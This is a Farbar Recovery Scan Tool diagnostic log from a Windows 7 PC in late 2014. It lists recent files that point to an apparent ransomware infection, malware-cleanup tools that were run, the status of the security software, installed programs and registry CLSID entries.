2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\Users\Administrator\AppData\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\ProgramData\INSTALL_TOR.URL
2014-10-30 20:03 - 2014-10-30 20:03 - 00000424 _____ () C:\ProgramData\@system.temp
2014-10-30 20:03 - 2014-10-30 20:03 - 00000160 ____H () C:\ProgramData\@system3.att
2014-10-30 20:03 - 2014-10-30 20:03 - 00000000 ____D () C:\Users\scalac\AppData\Roaming\FrameworkUpdate7
2014-10-30 17:23 - 2014-10-31 14:22 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-30 17:22 - 2014-10-31 08:05 - 00000000 ____D () C:\Users\scalac\Desktop\mbar
2014-10-30 16:15 - 2014-10-30 16:15 - 00000000 ____D () C:\Program Files\ESET
2014-10-30 15:42 - 2014-10-30 15:42 - 00000912 _____ () C:\Users\scalac\Desktop\JRT.txt
2014-10-30 15:39 - 2014-10-30 15:39 - 00000000 ____D () C:\Windows\ERUNT
2014-10-30 15:36 - 2014-11-03 08:32 - 00000280 _____ () C:\Windows\setupact.log
2014-10-30 15:36 - 2014-10-31 14:22 - 00003042 _____ () C:\Windows\PFRO.log
2014-10-30 15:36 - 2014-10-30 15:36 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-30 14:36 - 2014-10-31 08:58 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-10-30 14:19 - 2014-10-30 14:19 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-10-30 11:58 - 2014-10-30 11:58 - 24489269 _____ () C:\Users\scalac\Downloads\setup_free.exe
2014-10-29 16:07 - 2014-10-30 20:14 - 00000000 ____D () C:\Windows\Minidump
2014-10-29 15:03 - 2014-10-29 15:11 - 00000000 ____D () C:\NPE
2014-10-29 14:57 - 2014-10-29 14:58 - 00000000 ____D () C:\ProgramData\SMR430
2014-10-29 14:52 - 2014-10-29 15:03 - 00000000 ____D () C:\Users\scalac\AppData\Local\NPE
2014-10-29 14:52 - 2014-10-29 14:54 - 00000000 ____D () C:\ProgramData\Norton
2014-10-29 11:43 - 2014-10-29 11:44 - 00002000 _____ () C:\Users\scalac\Desktop\attach.txt
2014-10-29 11:39 - 2014-10-29 11:39 - 00688992 ____R (Swearware) C:\Users\scalac\Desktop\dds.com
2014-10-29 11:37 - 2014-10-29 16:43 - 00087200 _____ () C:\ProgramData\wrnhoah.tmp
2014-10-28 08:09 - 2014-10-28 08:09 - 00854448 _____ () C:\Users\scalac\Desktop\SecurityCheck.exe
2014-10-24 10:57 - 2014-10-24 10:57 - 00001368 _____ () C:\ProgramData\@system.att
2014-10-24 10:54 - 2014-10-24 10:57 - 00001104 ____H () C:\ProgramData\@system2.att
2014-10-24 10:54 - 2014-10-24 10:54 - 00000448 ____H () C:\Users\scalac\AppData\Roaming\麽鎒駓覜
2014-10-24 04:15 - 2014-10-31 10:37 - 00000000 ____D () C:\Users\scalac\AppData\Local\CrashDumps
2014-10-23 16:27 - 2014-10-31 17:03 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-23 16:27 - 2014-10-23 16:27 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-23 16:09 - 2014-10-23 16:09 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\scalac\Downloads\rkill.exe
2014-10-23 15:34 - 2014-10-23 16:17 - 00002288 _____ () C:\Users\scalac\Desktop\Rkill.txt
2014-10-23 12:54 - 2014-10-30 17:17 - 00734791 _____ () C:\Windows\WindowsUpdate.log
2014-10-23 12:42 - 2014-10-23 12:42 - 00049984 _____ () C:\ComboFix.txt
2014-10-23 12:31 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-23 12:31 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-23 12:31 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-23 12:31 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-23 12:31 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-23 12:31 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-23 12:31 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-23 12:31 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-23 12:30 - 2014-10-30 20:06 - 00000000 ____D () C:\Qoobox
2014-10-23 12:29 - 2014-10-23 12:41 - 00000000 ____D () C:\Windows\erdnt
2014-10-23 11:06 - 2014-10-30 20:03 - 00000000 ____D () C:\AdwCleaner
2014-10-23 11:06 - 2014-10-23 11:06 - 00000000 ____D () C:\Users\scalac\AppData\Local\Macromedia
2014-10-23 09:48 - 2014-10-23 09:48 - 00000937 _____ () C:\Users\Public\Desktop\Speccy.lnk
2014-10-23 09:48 - 2014-10-23 09:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Speccy
2014-10-23 09:48 - 2014-10-23 09:48 - 00000000 ____D () C:\Program Files\Speccy
2014-10-23 09:40 - 2014-10-30 20:08 - 00000000 ____D () C:\Users\scalac\AppData\Roaming\Mozilla
2014-10-23 09:40 - 2014-10-30 15:36 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-10-23 09:40 - 2014-10-23 09:41 - 00000000 ____D () C:\Users\scalac\AppData\Local\Mozilla
2014-10-23 09:40 - 2014-10-23 09:40 - 00001117 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-10-23 09:40 - 2014-10-23 09:40 - 00001105 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk
2014-10-23 09:40 - 2014-10-23 09:40 - 00000000 ____D () C:\ProgramData\Mozilla
2014-10-23 08:55 - 2014-10-31 07:39 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-23 08:33 - 2014-10-23 15:46 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-23 08:33 - 2014-10-23 15:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-23 08:32 - 2014-10-30 17:22 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-23 08:32 - 2014-10-23 17:33 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-23 08:32 - 2014-10-01 10:11 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-23 08:32 - 2014-10-01 10:11 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-22 14:26 - 2014-10-22 14:29 - 00042784 _____ () C:\Users\scalac\Documents\Football 2014.xls
2014-10-22 07:02 - 2014-10-22 07:02 - 00014784 _____ () C:\Users\scalac\Documents\World Series Boxes 2014.xlsx
2014-10-17 08:02 - 2014-10-09 20:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-17 08:02 - 2014-10-09 20:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-17 08:02 - 2014-10-09 20:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-17 07:04 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-17 07:04 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-17 07:04 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-17 07:04 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-17 07:04 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-17 07:04 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-17 07:04 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-17 07:04 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-17 07:04 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-17 07:04 - 2014-09-18 20:14 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-17 07:04 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-17 07:04 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-17 07:04 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-17 07:04 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-17 07:04 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-17 07:04 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-17 07:04 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-17 07:04 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-17 07:04 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-17 07:04 - 2014-09-18 19:50 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-17 07:04 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-17 07:04 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-17 07:04 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-17 07:04 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-17 07:04 - 2014-09-18 19:20 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-17 07:04 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-17 07:04 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-17 07:04 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-17 07:04 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-17 07:04 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-16 11:14 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 11:14 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 11:14 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-16 11:11 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 11:07 - 2014-09-28 19:43 - 02387968 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-16 11:05 - 2014-09-24 20:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-16 11:04 - 2014-08-01 06:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-10-16 11:03 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-10-16 11:01 - 2014-06-23 21:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-10-15 08:31 - 2014-10-15 08:32 - 00042784 _____ () C:\Users\scalac\Documents\'14WK07 (2).xls
2014-10-10 14:06 - 2014-10-10 14:08 - 00030496 _____ () C:\Users\scalac\Documents\TIME SHEET 10 17 14.xls
2014-10-09 07:57 - 2014-10-09 07:57 - 00042784 _____ () C:\Users\scalac\Documents\14WK06.xls

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-03 11:32 - 2011-11-29 09:33 - 00000232 _____ () C:\Windows\system32\config\netlogon.ftl
2014-11-03 11:27 - 2012-05-31 10:28 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-03 08:40 - 2009-07-13 23:34 - 00032480 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-03 08:40 - 2009-07-13 23:34 - 00032480 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-03 08:32 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-31 17:03 - 2010-11-20 16:01 - 00849650 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-31 08:07 - 2010-11-20 19:47 - 00000000 ____D () C:\Windows\CSC
2014-10-30 20:11 - 2012-12-06 14:52 - 00000000 ____D () C:\Users\scalac\Documents\Signatures
2014-10-30 20:11 - 2012-12-06 14:52 - 00000000 ____D () C:\Users\scalac\Documents\Outlook PSTs
2014-10-30 20:11 - 2012-12-06 12:41 - 00000000 ____D () C:\Users\scalac
2014-10-30 20:08 - 2013-02-27 11:57 - 00000000 ____D () C:\Users\scalac\AppData\Local\NEC
2014-10-30 20:08 - 2012-12-07 09:16 - 00000000 ____D () C:\Users\scalac\AppData\Roaming\Adobe
2014-10-30 20:07 - 2013-03-27 11:48 - 00000000 ____D () C:\Users\scalac\AppData\Local\AOL
2014-10-30 20:07 - 2011-11-29 12:41 - 00000000 ____D () C:\Users\alvayerog
2014-10-30 20:06 - 2014-07-23 15:13 - 00000000 ____D () C:\ProgramData\Symantec
2014-10-30 20:06 - 2011-11-29 08:57 - 00000000 ____D () C:\Users\Administrator
2014-10-30 20:05 - 2014-05-15 08:03 - 00000000 ____D () C:\ProgramData\Citrix
2014-10-30 20:04 - 2011-11-29 08:35 - 00000000 ____D () C:\dell
2014-10-30 14:55 - 2011-11-29 09:29 - 00000965 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-30 14:55 - 2011-11-29 09:29 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-29 19:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\LogFiles
2014-10-24 07:26 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-23 12:42 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-10-23 12:41 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-10-23 11:27 - 2012-05-31 10:28 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-10-23 11:27 - 2011-11-29 14:26 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-10-23 11:05 - 2012-12-07 12:32 - 00000000 ____D () C:\Users\scalac\AppData\Local\Adobe
2014-10-23 10:36 - 2012-12-06 14:52 - 33539360 _____ () C:\Users\scalac\Documents\CSCALA.PST
2014-10-23 09:54 - 2011-11-29 11:55 - 00000000 ____D () C:\Windows\Panther
2014-10-23 09:47 - 2011-11-29 09:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-10-23 08:37 - 2013-05-10 07:38 - 00000000 ____D () C:\Users\scalac\AppData\Roaming\Malwarebytes
2014-10-23 08:32 - 2011-11-29 09:30 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-22 12:37 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-10-22 09:15 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-22 06:30 - 2009-07-13 23:33 - 00341168 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-22 06:28 - 2014-05-02 15:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-17 08:01 - 2011-11-29 14:28 - 00000000 ____D () C:\Program Files\Common Files\Adobe AIR
2014-10-17 07:02 - 2011-11-29 09:20 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-09 11:30 - 2014-07-23 15:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Symantec
2014-10-09 11:30 - 2014-07-23 15:13 - 00000000 ____D () C:\Program Files\Common Files\Altiris

Some content of TEMP:
====================
C:\Users\scalac\AppData\Local\temp\dllnt_dump.dll
C:\Users\scalac\AppData\Local\temp\Quarantine.exe
C:\Users\scalac\AppData\Local\temp\{05E6A4A8-EB4E-493C-BC90-876900B580E2}.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-30 07:38

==================== End Of Log ============================


Additional scan result of Farbar Recovery Scan Tool (x86) Version: 02-11-2014
Ran by ScalaC at 2014-11-03 11:37:03
Running from C:\Users\scalac\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Symantec Endpoint Protection (Disabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Symantec Endpoint Protection (Disabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Symantec Endpoint Protection (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM\...\Adobe AIR) (Version: 15.0.0.293 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.08) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.08 - Adobe Systems Incorporated)
AIM for Windows (HKCU\...\AIM) (Version:  - AOL Inc.)
Altiris Application Metering Agent (Version: 7.5.3251.0 - Symantec Corporation) Hidden
Altiris Inventory Agent (Version: 7.5.3251.0 - Symantec Corporation) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.19 - Piriform)
Cisco Systems VPN Client 5.0.07.0410 (HKLM\...\{1CE60928-8325-49A8-8B06-633E48DD2B67}) (Version: 5.0.7 - Cisco Systems, Inc.)
Citrix online plug-in - web (HKLM\...\CitrixOnlinePluginPackWeb) (Version: 12.3.0.8 - Citrix Systems, Inc.)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1208.101.125 - ALPS ELECTRIC CO., LTD.)
ESET Online Scanner v3 (HKLM\...\ESET Online Scanner) (Version:  - )
HP LaserJet Professional P1100-P1560-P1600 Series (HKLM\...\HP LaserJet Professional P1100-P1560-P1600 Series) (Version:  - )
Intel® Management Engine Components (HKLM\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Standard 2010 (HKLM\...\Office14.STANDARD) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft SQL Server 2005 Backward compatibility (HKLM\...\{96327C3C-96BE-4C7A-A6F7-A71635E5949A}) (Version: 8.05.1054 - Microsoft Corporation)
Microsoft Visio Viewer 2013 (HKLM\...\{95150000-0052-0409-0000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation)
Mozilla Firefox 33.0.2 (x86 en-US) (HKLM\...\Mozilla Firefox 33.0.2 (x86 en-US)) (Version: 33.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 33.0 - Mozilla)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
NSSSLInstall (HKLM\...\{35818FB9-877D-43FA-878C-A6D06AFE839F}) (Version: 1.20.0000 - Black Box Network Services)
O2Micro Flash Memory Card Windows Driver (HKLM\...\InstallShield_{0CB3B7EE-52C7-4136-AF40-605567D90318}) (Version: 3.0.07.23 - O2Micro International LTD.)
O2Micro Flash Memory Card Windows Driver (Version: 3.0.07.23 - O2Micro International LTD.) Hidden
Patch Management Agent (Version: 7.5.3219.0 - Symantec) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM\...\{90140000-0012-0000-0000-0000000FF1CE}_Office14.STANDARD_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Software Management Solution Plugin (Version: 7.5.3219.0 - Altiris Inc.) Hidden
Speccy (HKLM\...\Speccy) (Version: 1.26 - Piriform)
Symantec Endpoint Protection (HKLM\...\{78BC019C-656D-4458-A860-6977AA85049A}) (Version: 12.1.4112.4156 - Symantec Corporation)
Symantec Management Agent (HKLM\...\AltirisAgent) (Version: 7.5.3193.0 - Symantec Corporation)
Tigerpaw CRM+ (HKLM\...\{0BA5748D-A033-4922-B526-02C047018E16}) (Version: 10.7.6 - Tigerpaw Software, Inc.)
UC700 Client (HKLM\...\{289043F4-94B9-4021-BDBD-3B5504C3E24B}) (Version: 10.0.1082 - NEC Corporation)
UNIVERGE Soft Client SP350 (Version: 2.00.0000 - NEC) Hidden
UNIVERGE Soft Client SP350 R5.50.0.5 UNIVERGE SV8300 Invisible Mode (HKLM\...\{74A8A18F-E299-4BB0-BF09-D7FB75CA26DB}) (Version: 5.50.0.5 - NEC)
WinRAR 4.11 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.11.0 - win.rar GmbH)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0049A510-CE20-302F-A9C6-722FEE7FEE67}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{01FC31CF-8455-3064-B22D-F7E908F8D7DE}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{03FA88B8-CCD8-32BA-9ED4-1C37405D98CD}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{062A92D5-4E70-381B-83A6-13B1C83BB070}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0875D743-741B-306B-B263-4F1EBCB6C0E1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{094557C8-8D13-3A57-93CD-48CDFBC346A4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{09A0F791-40F8-3FCB-9C91-DC6F2A4DC96B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0AEB5AAD-06AE-3748-800A-63BFB53940BB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0C377237-DC8B-3D6D-BCF8-E4F156760E9B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0CE87BF5-DA17-3EA0-8B90-79E59792F4F3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0D7A82DE-6A6D-3BB1-8E24-386FB792930D}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0DE2534F-A3C8-3E24-9749-687850CEB3A8}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{1060D0CD-5B56-3EEE-BB3A-AEC8472522B3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{1299B0C9-29A3-3940-AC1D-1FFC076798B1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{16746680-B251-396C-914A-0211B5CB7F23}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{16ADB401-64F5-3324-A88A-10AE369749FB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{16E320DC-C9FC-33E3-8B4D-7BF35CF3B7E3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{171A0B7B-6ADA-3C17-B15F-17B0B0E938A6}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{17608187-F734-32F0-9A46-71A10F592910}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{1B1C5E01-5354-36F7-8E8F-0F8AEE27E5E0}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{20FC2C0D-E606-3FB2-BD1A-A2A8E8E08AFC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{212D7A0C-C0C7-3F44-958D-E62CAD50DEB4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{231B15ED-A845-368D-B77C-C735413ADFA9}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{252EE0FB-BF08-30FB-84DF-BA863C6AFA09}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{2A6FC347-B37A-3B7A-8DA8-FA857F1446CC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{2ABCFF5F-70A5-3EAD-BA6A-CB8788133E18}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
